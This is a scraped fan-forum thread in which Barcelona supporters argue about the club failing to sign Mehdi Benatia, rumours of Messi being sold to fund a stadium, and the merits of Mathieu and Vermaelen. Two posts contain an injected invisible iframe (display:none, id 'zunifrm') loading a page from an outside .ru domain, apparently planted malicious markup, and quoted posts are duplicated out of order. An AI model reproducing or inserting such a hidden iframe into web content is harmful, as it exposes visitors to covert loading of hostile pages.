Mehdi Benatia

F

Flavia

Benatia's transfer fee is undisclosed. Roma is ashamed or Bayern paid more than what's being published.

This press and these tv shows come out with lies dailly to sell papers.

No need to pay them more attention when something as absurd as selling Messi to pay for a stadium comes up.

Messi rumours and Titos conversation were both to do with Messi being unhappy due to wages and murmurs from fans about his performances. Had Messi got sold because he was unhappy and wanted to leave that is one thing but its not the same as selling a happy Messi to fund a stadium.

I'm not talking about el chiringuito or whatever, btw. I know there are joke journos, but there are also serious people.

<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

R

Ryu Hayabusa

Benatia's transfer fee is undisclosed. Roma is ashamed or Bayern paid more than what's being published.

I'm not talking about el chiringuito or whatever, btw. I know there are joke journos, but there are also serious people.

<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Officially, Bayern never disclose transfer fees.

Bertus

bertus the main point i'm trying to make is that ok we didn't get him, but what we did get isn't bad at all, but actually good. mathieu and verm fit nicely and for sure mathieu has the quality, verm fits in nicely in terms of style and he has the chance to compete and maybe even win a starting place. either way even if he is a bench player he is very good quality for a backup and at a good price.

And what I meant doesn't go against any of that.

I just said that benatia is on par or better on any skills displayed by mathieu and vermi.

But some people here dare implying he's worse since "he doesn't fit barcelona".

Especially since it comes from people who never watched benatia it seems since they can't even make explain how Benatia fits less barcelona than Vermi or mathieu.

F

Flavia

Please don't sell it as a fact that the board nearly sold Messi, there were just rumours.
Messi's statements? Which statements? He was asked about leaving, what was he supposed to answer?
The story with Tito? Who leaked the info to the press?
Why was his contract renewed when the board wanted to sell him?

It'd be suicidal for the board to sell Messi. No way this will happen. Now give me my free entry to the ''I told you so'' Hall of Fame

How am I selling anything as "fact"? I'm just saying I think there were truth to those rumors. There was turbulence between Messi and the board. Still, you don't need to overreact like that. It's just my opinion.

Alarcón

I'm done with those people. Yeah we made good signings but when you look at the defenders we've bought and the fact that Benatia was available, it's just pure stupidity not to buy him.

Hamzah

High Definition Member
And what I meant doesn't go against any of that.

I just said that benatia is on par or better on any skills displayed by mathieu and vermi.

But some people here dare implying he's worse since "he doesn't fit barcelona".

Especially since it comes from people who never watched benatia it seems since they can't even make explain how Benatia fits less barcelona than Vermi or mathieu.

i think he would fit in but maybe the board didn't? or lucho? who knows.

still people will sit and whine (not you necessarily) that benatia wasn't signed without acknowledging that the defense has improved in terms of players. if lucho gets the tactics right our defense will be good enough.

I

instinct

How am I selling anything as "fact"? I'm just saying I think there were truth to those rumors. There was turbulence between Messi and the board. Still, you don't need to overreact like that. It's just my opinion.

Sorry if I got you wrong but you said ''Messi was almost sold this summer to fund the new stadium''. Maybe there was a misunderstanding.

JamDav1982

Messi was never getting sold to fund a new stadium it makes no sense whatsoever.

The board would get thrown out the moment they entertained that idea.

It was rumors with no substance.

Tito speaking to Messi on his death bed and Messi comments none of this is linked to the board wanting to sell him to fund stadium.

The only action of the board was to give him a new contract without increasing his buy out or the length of contract.

Alarcón

still people will sit and whine (not you necessarily) that benatia wasn't signed without acknowledging that the defense has improved in terms of players. if lucho gets the tactics right our defense will be good enough.

There is no 'good enough' for a team like Barca. There is only 'the best', and Mathieu and Vermaelen, as good as they might turn out to be, are far from the best.

Bertus

The defense has improved. Especially with mathieu which I fully support because he's a very good player on and off the pitch.

Now if we're talking about Vermi over Benatia, I have more difficulties to swallow it I admit.

L

linetty

There is no 'good enough' for a team like Barca. There is only 'the best', and Mathieu and Vermaelen, as good as they might turn out to be, are far from the best.
Mascherano has been a Barca CB for a long period of time and he was never close to 'the best'

Icarium

Lifestealer
Going for Verminator over Benatia is very questionable move but board must have some other priorities i think.. Reus or Cuadrado? Benatia value was brought down from 35M to 27M as we are nearing end of transfer window and the fact that benatia wanted to leave. I am hoping same thing happens with Cuadrado, so we can sign him for 35M. But this Douglas deal might be the last deal for the next two seasons. Damn disappointing. We will be in desperate need of RB next season and transfer ban means we can't sign anyone.

Home of Barca Fans